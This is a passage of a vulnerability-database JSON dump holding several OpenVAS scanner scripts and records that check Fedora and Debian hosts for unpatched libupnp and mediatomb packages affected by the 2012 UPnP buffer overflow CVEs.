http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"libupnp on Fedora 17\";\ntag_insight = \"The Universal Plug and Play (UPnP) SDK for Linux provides\n support for building UPnP-compliant control points, devices,\n and bridges on Linux.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098643.html\");\n script_id(865353);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-15 11:14:13 +0530 (Fri, 15 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-1734\");\n script_name(\"Fedora Update for libupnp FEDORA-2013-1734\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libupnp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : 
tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"libupnp\", rpm:\"libupnp~1.6.18~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-02-22T00:00:00", "id": "OPENVAS:1361412562310865371", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865371", "type": "openvas", "title": "Fedora Update for mediatomb FEDORA-2013-2377", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediatomb FEDORA-2013-2377\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099022.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865371\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 09:59:05 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-2377\");\n script_name(\"Fedora Update for mediatomb FEDORA-2013-2377\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediatomb'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"mediatomb on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediatomb\", rpm:\"mediatomb~0.12.1~23.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-22T13:10:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "Check for the Version of mediatomb", "modified": "2018-01-22T00:00:00", "published": "2013-02-22T00:00:00", "id": "OPENVAS:865371", "href": "http://plugins.openvas.org/nasl.php?oid=865371", "type": "openvas", "title": "Fedora Update for mediatomb FEDORA-2013-2377", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediatomb FEDORA-2013-2377\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"MediaTomb is an open source (GPL) UPnP MediaServer with a nice web user\n interface, it allows you to stream your digital media through your home\n network and listen to/watch it on a variety of UPnP compatible devices.\n\n MediaTomb implements the UPnP MediaServer V 1.0 specification that can\n be found on <A HREF= &qt http://www.upnp.org/. &qt >http://www.upnp.org/.</A>\";\n\n\ntag_affected = \"mediatomb on Fedora 18\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099022.html\");\n script_id(865371);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 09:59:05 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-2377\");\n script_name(\"Fedora Update for mediatomb FEDORA-2013-2377\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mediatomb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediatomb\", rpm:\"mediatomb~0.12.1~23.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-23T13:10:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "Check for the Version of libupnp", "modified": "2018-01-23T00:00:00", "published": "2013-02-15T00:00:00", "id": "OPENVAS:865345", "href": "http://plugins.openvas.org/nasl.php?oid=865345", "type": "openvas", "title": "Fedora Update for libupnp FEDORA-2013-1713", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libupnp FEDORA-2013-1713\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_solution = \"Please Install the Updated Packages.\";\ntag_insight = \"The Universal Plug and Play (UPnP) SDK for Linux provides\n support for building UPnP-compliant control points, devices,\n and bridges on Linux.\";\ntag_affected = \"libupnp on Fedora 16\";\n\n\n\n\nif(description)\n{\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098665.html\");\n script_id(865345);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-15 11:13:21 +0530 (Fri, 15 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-1713\");\n script_name(\"Fedora Update for libupnp FEDORA-2013-1713\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libupnp\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"libupnp\", rpm:\"libupnp~1.6.18~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-02-15T00:00:00", "id": "OPENVAS:1361412562310865359", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865359", "type": "openvas", "title": "Fedora Update for libupnp FEDORA-2013-1765", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libupnp FEDORA-2013-1765\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"affected\", value:\"libupnp on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098664.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865359\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-15 11:14:50 +0530 (Fri, 15 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-1765\");\n script_name(\"Fedora Update for libupnp FEDORA-2013-1765\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libupnp'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"libupnp\", rpm:\"libupnp~1.6.18~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-18T11:08:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "Check for the Version of libupnp", "modified": "2018-01-18T00:00:00", "published": "2013-02-15T00:00:00", "id": "OPENVAS:865359", "href": "http://plugins.openvas.org/nasl.php?oid=865359", "type": "openvas", "title": "Fedora Update for libupnp FEDORA-2013-1765", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libupnp FEDORA-2013-1765\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_solution = \"Please Install the Updated Packages.\";\ntag_insight = \"The Universal Plug and Play (UPnP) SDK for Linux provides\n support for building UPnP-compliant control points, devices,\n and bridges on Linux.\";\ntag_affected = \"libupnp on Fedora 18\";\n\n\n\n\nif(description)\n{\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098664.html\");\n script_id(865359);\n script_version(\"$Revision: 8456 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 07:58:40 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-15 11:14:50 +0530 (Fri, 15 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-1765\");\n script_name(\"Fedora Update for libupnp FEDORA-2013-1765\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libupnp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security 
Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"libupnp\", rpm:\"libupnp~1.6.18~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "Multiple stack-based buffer overflows were discovered in libupnp4, a library\nused for handling the Universal Plug and Play protocol. HD Moore from Rapid7\ndiscovered that SSDP queries were not correctly handled by the\nunique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built on\nlibupnp4 could generate a buffer overflow, overwriting the stack, leading to\nthe daemon crash and possible remote code execution.", "modified": "2019-03-18T00:00:00", "published": "2013-02-01T00:00:00", "id": "OPENVAS:1361412562310892615", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892615", "type": "openvas", "title": "Debian Security Advisory DSA 2615-1 (libupnp4 - several vulnerabilities)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2615.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 2615-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright 
(c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892615\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2012-5964\", \"CVE-2012-5962\", \"CVE-2012-5961\", \"CVE-2012-5959\", \"CVE-2012-5965\", \"CVE-2012-5963\", \"CVE-2012-5960\", \"CVE-2012-5958\");\n script_name(\"Debian Security Advisory DSA 2615-1 (libupnp4 - several vulnerabilities)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-01 00:00:00 +0100 (Fri, 01 Feb 2013)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2615.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"libupnp4 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For 
the stable distribution (squeeze), these problems have been fixed in\nversion 1.8.0~svn20100507-1+squeeze1.\n\nFor the testing distribution (wheezy), these problems have been fixed in\nversion 1.8.0~svn20100507-1.2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.8.0~svn20100507-1.2.\n\nWe recommend that you upgrade your libupnp4 packages.\");\n script_tag(name:\"summary\", value:\"Multiple stack-based buffer overflows were discovered in libupnp4, a library\nused for handling the Universal Plug and Play protocol. HD Moore from Rapid7\ndiscovered that SSDP queries where not correctly handled by the\nunique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built on\nlibupnp4 could generate a buffer overflow, overwriting the stack, leading to\nthe daemon crash and possible remote code execution.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libupnp4\", ver:\"1.8.0~svn20100507-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libupnp4-dbg\", ver:\"1.8.0~svn20100507-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libupnp4-dev\", ver:\"1.8.0~svn20100507-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libupnp4-doc\", ver:\"1.8.0~svn20100507-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libupnp4\", ver:\"1.8.0~svn20100507-1.2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libupnp4-dbg\", ver:\"1.8.0~svn20100507-1.2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"libupnp4-dev\", ver:\"1.8.0~svn20100507-1.2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libupnp4-doc\", ver:\"1.8.0~svn20100507-1.2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-02-15T00:00:00", "id": "OPENVAS:1361412562310865353", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865353", "type": "openvas", "title": "Fedora Update for libupnp FEDORA-2013-1734", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libupnp FEDORA-2013-1734\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098643.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865353\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-15 11:14:13 +0530 (Fri, 15 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-1734\");\n script_name(\"Fedora Update for libupnp FEDORA-2013-1734\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libupnp'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 